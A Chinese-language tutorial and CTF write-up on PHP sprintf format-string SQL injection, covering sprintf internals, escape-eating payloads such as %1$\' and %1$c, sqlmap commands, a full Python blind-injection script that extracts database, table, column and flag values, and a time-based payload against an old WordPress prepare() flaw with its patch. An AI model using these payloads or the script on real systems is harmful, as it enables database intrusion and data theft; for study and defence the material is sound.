sprintf中怎么格式化字符串漏洞

本篇文章為大家展示了sprintf中怎么格式化字符串漏洞，內(nèi)容簡明扼要并且容易理解，絕對能使你眼前一亮，通過這篇文章的詳細介紹希望你能有所收獲。

首先我們先了解sprintf()函數(shù)

sprintf() 函數(shù)把格式化的字符串寫入變量中。 

sprintf(format,arg1,arg2,arg++) arg1、arg2、++ 參數(shù)將被插入到主字符串中的百分號（%）符號處。該函數(shù)是逐步執(zhí)行的。在第一個 % 符號處，插入 arg1，在第二個 % 符號處，插入 arg2，依此類推。 注釋：如果 % 符號多于 arg 參數(shù)，則您必須使用占位符。占位符位于 % 符號之后，由數(shù)字和 "\$" 組成。

通過幾個例子回顧一下sprintf

<?php $number = 123; $txt = sprintf("帶有兩位小數(shù)：%1\$.2f<br>不帶小數(shù)：%1\$u",$number); echo $txt; ?> 輸出結果: 帶有兩位小數(shù)：123.00 不帶小數(shù)：123

例子2： 

<?php $num1 = 123456789; $num2 = -123456789; $char = 50; // ASCII 字符 50 是 2 //注釋：格式值 "%%" 返回百分號 echo sprintf("%%b = %b",$num1)."<br>"; // 二進制數(shù) echo sprintf("%%c = %c",$char)."<br>"; // ASCII 字符 echo sprintf("%%s = %s",$num1)."<br>"; // 字符串 echo sprintf("%%x = %x",$num1)."<br>"; // 十六進制數(shù)（小寫） echo sprintf("%%X = %X",$num1)."<br>"; // 十六進制數(shù)（大寫） ?> 輸出結果: %b = 111010110111100110100010101 %c = 2  //注意var_dump('2')為string %s = 123456789 %x = 75bcd15 %X = 75BCD15

0x02 sprintf注入原理

底層代碼實現(xiàn)

我們來看一下sprintf()的底層實現(xiàn)方法 

switch (format[inpos]) { case 's': { zend_string *t; zend_string *str = zval_get_tmp_string(tmp, &t); php_sprintf_appendstring(&result, &outpos,ZSTR_VAL(str),width, precision, padding,alignment,ZSTR_LEN(str),0, expprec, 0); zend_tmp_string_release(t); break;    }    case 'd':        php_sprintf_appendint(&result, &outpos,                              zval_get_long(tmp),                              width, padding, alignment,                              always_sign);        break;    case 'u':        php_sprintf_appenduint(&result, &outpos,                              zval_get_long(tmp),                              width, padding, alignment);        break;    case 'g':    case 'G':    case 'e':    case 'E':    case 'f':    case 'F':        php_sprintf_appenddouble(&result, &outpos,                                 zval_get_double(tmp),                                 width, padding, alignment,                                 precision, adjusting,                                 format[inpos], always_sign                                );        break;    case 'c':        php_sprintf_appendchar(&result, &outpos,                            (char) zval_get_long(tmp));        break;    case 'o':        php_sprintf_append2n(&result, &outpos,                             zval_get_long(tmp),                             width, padding, alignment, 3,                             hexchars, expprec);        break;    case 'x':        php_sprintf_append2n(&result, &outpos,                             zval_get_long(tmp),                             width, padding, alignment, 4,                             hexchars, expprec);        break;    case 'X':        php_sprintf_append2n(&result, &outpos,                             zval_get_long(tmp),                             width, padding, alignment, 4,                             HEXCHARS, expprec);        break;    case 'b':        php_sprintf_append2n(&result, &outpos,                             zval_get_long(tmp),                             width, padding, alignment, 1,                             hexchars, expprec);        break;    case '%':        php_sprintf_appendchar(&result, &outpos, '%');        break;    default:        break; }

可以看到， php源碼中只對15種類型做了匹配， 其他字符類型都直接break了，php未做任何處理，直接跳過，所以導致了這個問題： 沒做字符類型檢測的最大危害就是它可以吃掉一個轉義符\, 如果%后面出現(xiàn)一個\,那么php會把\當作一個格式化字符的類型而吃掉\, 最后%\（或%1$\）被替換為空 因此sprintf注入，或者說php格式化字符串注入的原理為： 要明白%后的一個字符(除了%，%上面表格已經(jīng)給出了)都會被當作字符型類型而被吃掉，也就是被當作一個類型進行匹配后面的變量，比如%c匹配asciii碼，%d匹配整數(shù)，如果不在定義的也會匹配，匹配空，比如%\，這樣我們的目的只有一個，使得單引號逃逸，也就是能夠起到閉合的作用。

這里我們舉兩個例子

NO.1

不使用占位符號 

<?php $sql = "select * from user where username = '%\' and 1=1#';" ; $args = "admin" ; echo  sprintf ( $sql , $args ) ; //=> echo sprintf("select * from user where username = '%\' and 1=1#';", "admin"); //此時%\回去匹配admin字符串，但是%\只會匹配空 運行后的結果 select * from user where username = '' and 1=1#'

NO.2

使用占位符號 

<?php $input = addslashes ("%1$' and 1=1#" ); $b = sprintf ("AND b='%s'", $input ); $sql = sprintf ("SELECT * FROM t WHERE a='%s' $b ", 'admin' ); //對$input與$b進行了拼接 //$sql = sprintf ("SELECT * FROM t WHERE a='%s' AND b='%1$\' and 1=1#' ", 'admin' ); //很明顯，這個句子里面的\是由addsashes為了轉義單引號而加上的，使用%s與%1$\類匹配admin，那么admin只會出現(xiàn)在%s里，%1$\為空 echo  $sql ; 運行后的結果 SELECT * FROM t WHERE a='admin' AND b='' and 1=1#'

對于這個問題，我們還可以這樣寫 

$sql = sprintf ("SELECT * FROM table WHERE a='%1$\' AND b='%d' and 1=1#' ",'admin'); //result: SELECT * FROM t WHERE a='admin' AND b='' and 1=1#'

第一個格式化處匹配時為空，會讓給后面的格式化匹配 以上兩個例子是吃掉'\'來使得單引號逃逸出來 下面這個例子我們構造單引號

NO.3

對%c進行利用 

<? php $input1 = '%1$c) OR 1 = 1 /*' ; $input2 = 39 ; $sql = "SELECT * FROM foo WHERE bar IN (' $input1 ') AND baz = %s" ; $sql = sprintf ( $sql , $input2 ); echo  $sql ;

%c起到了類似chr()的效果，將數(shù)字39轉化為‘，從而導致了sql注入。 所以結果為： 

SELECT * FROM foo WHERE bar IN ('') OR 1 = 1 /*) AND baz = 39

小結

漏洞利用條件 1. sql語句進行了字符拼接 2. 拼接語句和原sql語句都用了vsprintf/sprintf 函數(shù)來格式化字符串 

ps: mysql> SELECT ascii('\''); +-------------+ | ascii('\'') | +-------------+ |          39 | +-------------+

0x03 題目訓練

一道注入題目

形式很像SQL注入，而且題目中提示為SQLI 先試了一下弱口令，確定username為admin 那么就對username與password進行注入，開始普通注入，二次解碼，寬字節(jié)，過濾空格，過濾關鍵字等姿勢進行構造注入語句都無果，而且還耗費大量的時間，不過后來get到一種姿勢，使用burpsuit的intruder跑一下，來查看那些字母或者字符沒有被過濾掉（waf字典） 后來發(fā)現(xiàn)%可疑，于是拿出來repeater一下

sprintf函數(shù)出錯，那么sprintf是什么，格式化字符串，于是乎就懂得其中的原理了，是其單引號逃逸 構造username=admin%1$\' and 1=2# 與 username=admin%1$\' and 1=1# 發(fā)現(xiàn)如下的結果

可以發(fā)現(xiàn)'后面的語句帶入執(zhí)行了，這就是注入點，使用sqlmap跑一下 事先抓取post包

python sqlmap.py -r 3.txt -p username --level 3 --dbs --thread 10

于是對ctf進行跑tables 得到

對flag跑columns 得到

對每個列進行dump但是dump下來不對，找了一波原因沒有找到，開始用腳本跑 跑完后才發(fā)現(xiàn)sqlmap跑出來的列不對，應該是flag，于是

python sqlmap.py -r 3.txt -p username --level 3 -D ctf -T flag -C flag --dump --thread 10

才得到正確結果 ：）  下面是腳本跑的

做實驗

利用sqlmap進行POST注入

http://hetianlab.com/expc.do?ce=1336a6fb-7b18-4dd6-8a6d-b9a7ae92f73d

（了解sqlmap，掌握sqlmap的常用命令，學會使用sqlmap進行POST注入攻擊）

中心思想

先判斷l(xiāng)ength 然后使用ascii判斷字母 ascii(substr(database()," + str(i) +",1))=" + str(ord(c)) + "#" 使用這個語句進行判斷 涉及到的一些知識點：

代碼

#coding:utf-8 import requests import string def boom():    url = r'http://f6f0cdc51f8141a6b1a8634161859c1c78499dc70eea47f0.game.ichunqiu.com/'    s = requests.session()    //會話對象requests.Session能夠跨請求地保持某些參數(shù)，比如cookies，即在同一個Session實例發(fā)出的所有請求都保持同一個cookies,而requests模塊每次會自動處理cookies，這樣就很方便地處理登錄時的cookies問題。    dic = string.digits + string.letters + "!@#$%^&*()_+{}-="    right = 'password error!'    error = 'username error!'    lens = 0    i = 0    //確定當前數(shù)據(jù)庫的長度    while True:        payload = "admin%1$\\' or " + "length(database())>" + str(i) + "#"        data={'username':payload,'password':1}        r = s.post(url,data=data).content        if error in r:            lens=i            break        i+=1        pass    print("[+]length(database()): %d" %(lens))    //確定當前數(shù)據(jù)庫的名字    strs=''    for i in range(lens+1):        for c in dic:            payload = "admin%1$\\' or " + "ascii(substr(database()," + str(i) +",1))=" + str(ord(c)) + "#"            data = {'username':payload,'password':1}            r = s.post(url,data=data).content            if right in r:                strs = strs + c                print strs                break        pass    pass    print("[+]database():%s" %(strs))    lens=0    i = 1    while True:        payload = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>" + str(i) + "#"        //對當前的數(shù)據(jù)庫，查詢第一個表的長度        data = {'username':payload,'password':1}        r = s.post(url,data=data).content        if error in r:            lens = i            break        i+=1        pass    print("[+]length(table): %d" %(lens))    strs=''    for i in range(lens+1):        for c in dic:            payload = "admin%1$\\' or " + "ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(i) +",1))=" + str(ord(c)) + "#"            // 數(shù)字一定要str才可以傳入            data = {'username':payload,'password':1}            r = s.post(url,data=data).content            if right in r:                strs = strs + c                print strs                break        pass    pass    print("[+]table_name:%s" %(strs))    tablename = '0x' + strs.encode('hex')    //編碼為16進制    table_name = strs    lens=0    i = 0    while True:        payload = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where table_name = " + str(tablename) + " limit 0,1)>" + str(i) + "#"        data = {'username':payload,'password':1}        r = s.post(url,data=data).content        if error in r:            lens = i            break        i+=1        pass    print("[+]length(column): %d" %(lens))    strs=''    for i in range(lens+1):        for c in dic:            payload = "admin%1$\\' or " + "ascii(substr((select column_name from information_schema.columns where table_name = " + str(tablename) +" limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"            data = {'username':payload,'password':1}            r = s.post(url,data=data).content            if right in r:                strs = strs + c                print strs                break        pass    pass    print("[+]column_name:%s" %(strs))    column_name = strs    num=0    i = 0    while True:        payload = "admin%1$\\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#"        data = {'username':payload,'password':1}        r = s.post(url,data=data).content        if error in r:            num = i            break        i+=1        pass    print("[+]number(column): %d" %(num))    lens=0    i = 0    while True:        payload = "admin%1$\\' or " + "(select length(" + column_name + ") from " + table_name + " limit 0,1)>" + str(i) + "#"        data = {'username':payload,'password':1}        r = s.post(url,data=data).content        if error in r:            lens = i            break        i+=1        pass    print("[+]length(value): %d" %(lens))    i=1        strs=''    for i in range(lens+1):        for c in dic:            payload = "admin%1$\\' or ascii(substr((select flag from flag limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"            data = {'username':payload,'password':'1'}            r = s.post(url,data=data).content            if right in r:                strs = strs + c                print strs                break        pass    pass    print("[+]flag:%s" %(strs)) if __name__ == '__main__':    boom()    print 'Finish!'

<?php $input = addslashes("%1$' and 1=1#"); echo $input; echo "\n"; $b = sprintf("AND b='%s'",$input); echo $b; echo "\n"; $sql = sprintf("select * from t where a='%s' $b",'admin'); echo $sql; >>>結果 %1$\' and 1=1# AND b='%1$\' and 1=1#' select * from t where a='admin' AND b='' and 1=1#'

格式字符%后面會吃掉一個\即%1$\被替換為空，逃逸出來一個單引號，造成注入.

0x04 Wordpress格式化字符串漏洞

漏洞跟蹤

wordpress版本小于4.7.5在后臺圖片刪除的地方存在一處格式化字符串漏洞 官方在4.7.6已經(jīng)給出了補救辦法 在我們即將要說的地方增加了這么一端代碼 

$query = preg_replace( '/%(?:%|$|([^dsF]))/', '%%\\1', $query ); // escape any unescaped percents

只允許 %后面出現(xiàn)dsF 這三種字符類型， 其他字符類型都替換為%%\1, 而且還禁止了%, $ 這種參數(shù)定位 首先 我們找到upload.php 可以發(fā)現(xiàn)在deleta中 $post_id_del（比如int()） 未經(jīng)過處理，直接傳入 

case 'delete':    if ( !isset( $post_ids ) )        break;    foreach ( (array) $post_ids as $post_id_del ) {        if ( !current_user_can( 'delete_post', $post_id_del ) ) //跟進            wp_die( __( 'Sorry, you are not allowed to delete this item.' ) );        if ( !wp_delete_attachment( $post_id_del ) )            wp_die( __( 'Error in deleting.' ) );    }    $location = add_query_arg( 'deleted', count( $post_ids ), $location );    break;

跟進wp_delete_attachment( )函數(shù) 其中參數(shù)$post_id_del為圖片的postid wp_delete_attachment( )中 調用了delete_metadata 函數(shù) 

function wp_delete_attachment( $post_id, $force_delete = false ) { ....... delete_metadata( 'post', null, '_thumbnail_id', $post_id, true ); // delete all for any posts. ...... }

繼續(xù)跟進delete_metadata函數(shù) 漏洞觸發(fā)點主要在wp-includes/meta.php 的 delete_metadata函數(shù)里面， 有如下代碼: 

if ( $delete_all ) {    $value_clause = '';    if ( '' !== $meta_value && null !== $meta_value && false !== $meta_value ) {        $value_clause = $wpdb->prepare( " AND meta_value = %s", $meta_value );    }    $object_ids = $wpdb->get_col( $wpdb->prepare( "SELECT $type_column FROM $table WHERE meta_key = %s $value_clause", $meta_key ) ); }

調用了兩個prepare函數(shù) 跟進prepare函數(shù) 

public function prepare( $query, $args ) {    if ( is_null( $query ) )        return;    // This is not meant to be foolproof -- but it will catch obviously incorrect usage.    if ( strpos( $query, '%' ) === false ) {        _doing_it_wrong( 'wpdb::prepare', sprintf( __( 'The query argument of %s must have a placeholder.' ), 'wpdb::prepare()' ), '3.9.0' ); }    $args = func_get_args();    array_shift( $args );    // If args were passed as an array (as in vsprintf), move them up    if ( isset( $args[0] ) && is_array($args[0]) )        $args = $args[0];    $query = str_replace( "'%s'", '%s', $query ); // in case someone mistakenly already singlequoted it    $query = str_replace( '"%s"', '%s', $query ); // doublequote unquoting    $query = preg_replace( '|(?<!%)%f|' , '%F', $query ); // Force floats to be locale unaware    $query = preg_replace( '|(?<!%)%s|', "'%s'", $query ); // quote the strings, avoiding escaped strings like %%s    array_walk( $args, array( $this, 'escape_by_ref' ) );    return @vsprintf( $query, $args ); }

詳細看prepare函數(shù)對傳入?yún)?shù)的處理過程 首先對%s進行處理 

$query = str_replace( "'%s'", '%s', $query ); // in case someone mistakenly already singlequoted it    $query = str_replace( '"%s"', '%s', $query ); // doublequote unquoting    $query = preg_replace( '|(?<!%)%f|' , '%F', $query ); // Force floats to be locale unaware    $query = preg_replace( '|(?<!%)%s|', "'%s'", $query ); // quote the strings, avoiding escaped strings like %%s

把'%s'替換為%s，然后再把"%s"替換成%s，替換為浮點數(shù)%F 把%s替換成'%s' 最后再進行vsprintf( $query, $args ); 對拼接的語句進行格式化處理 我們一步步分析 假設傳入的$meta_value為'admin'  

$wpdb->prepare( " AND meta_value = %s", $meta_value );

經(jīng)過prepare函數(shù)處理后得到 

vsprintf( " AND meta_value = '%s'",'admin') =>  AND meta_value = 'admin'

return到上一級函數(shù)后，繼續(xù)執(zhí)行這一條拼接語句： 

$wpdb->prepare( "SELECT $type_column FROM $table WHERE meta_key = %s $value_clause", $meta_key )

經(jīng)過prepare函數(shù)處理后得到 

vsprintf( "SELECT $type_column FROM $table WHERE meta_key = '%s'  AND meta_value = 'admin'",'admin') => SELECT $type_column FROM $table WHERE meta_key = 'admin'  AND meta_value = 'admin'

看起來一切都很正常，毫無bug 但是我們可以思考一下，怎樣使其形成注入呢？s> 或者說怎樣逃逸一個單引號？ 在之前我們先看一下，可控變量 $post_id_del 的路線 

$post_id_del => $post_id => $meta_value => $args => $query

顯然這里面兩處admin都有單引號，而且兩處都與 $post_id_del 聯(lián)系，如何來選擇？ 對于第一處單引號 它是通過一次替換處理得到的，顯然是對單引號>無法處理 對于第二處單引號 經(jīng)過兩次的替換，（這里的意思是執(zhí)行了兩次的替換代碼，可能第二段代碼對他沒有起到實質性的作用，僅僅是去點單引號然后又加上單引號） 但是這一出經(jīng)過了兩次處理是必須的，那么我們是否能夠是構造出另一個單引號（此時第二處有三個單引號）就可以閉合前面的單引號了 最重要的是，第二次的替換處理的變量是可控的，因此要引入單引號，我們需要$meta_value含有%s 那么第一次的結果為 

AND meta_value = 'X%sY'（其中XY為未知量） //這里需要注意，為什么%s不被單引號圍起來，我看過一篇博客，它是寫的'%s'，這顯然是錯的，為什么呢？我們生成了'%s'是沒錯，不過還原一下過程就知道了，首先我們生成了AND meta_value = '%s'，注意此時與$meta_value沒有半毛錢關系，后來的vsprintf后，才與$meta_value有了關系，原來的%s被替換成了X%sY，值得注意的是這里的%s沒有經(jīng)過任何處理，處理是在第二輪進行的，這是后話。

第二次后的結果為 

SELECT $type_column FROM $table WHERE meta_key = 'admin'  AND meta_value = 'X'%s'Y' （對于第二處的%s我們先不要帶入格式化后的值，其實真實的語句應該為： SELECT $type_column FROM $table WHERE meta_key = 'admin'  AND meta_value = 'X'admin'Y'）

分析到這里，相信大家應該知道傳值（$meta_value）使單引號逃逸出來了吧 admin顯然是多余的，那么我們需要把它放在單引號里面，因此第二個單引號需要去掉，那么第四個單引號需要注釋掉，這就很輕而易舉地構造sql語句 AND meta_value = 'Xadmin'Y Y里面就是我們注入的代碼

漏洞利用

怎么去傳值呢？ 利用格式化字符串漏洞 去掉第二個單引號就需要使該單引號成為%后的第一個字符，也就是%'，但是我們還需要一個占位符，%1$' 這樣就沒有報錯的去掉了該單引號 所以我們構造的payload為 

$meta_value = %1$%s AND SLEEP(5)# => AND meta_value = '%1$%s AND SLEEP(5)' => "SELECT $type_column FROM $table WHERE meta_key = '%s' AND meta_value = AND meta_value = '%1$'%s' AND SLEEP(5)#'",'admin' 其中 %1$' => 空 => SELECT $type_column FROM $table WHERE meta_key = 'admin'  AND meta_value = AND meta_value = 'admin' AND SLEEP(5)#' 成功利用該漏洞形成時間注入

漏洞修補

現(xiàn)在我們說一下第四部分開頭的補救方法 后來官方在prepare函數(shù)加了這一代碼 

$query = preg_replace( '/%(?:%|$|([^dsF]))/', '%%\\1', $query ); // escape any unescaped percents

只允許 %后面出現(xiàn)dsF 這三種字符類型， 其他字符類型都替換為%%\1, 而且還禁止了%, $ 這種參數(shù)定位

上述內(nèi)容就是sprintf中怎么格式化字符串漏洞，你們學到知識或技能了嗎？如果還想學到更多技能或者豐富自己的知識儲備，歡迎關注億速云行業(yè)資訊頻道。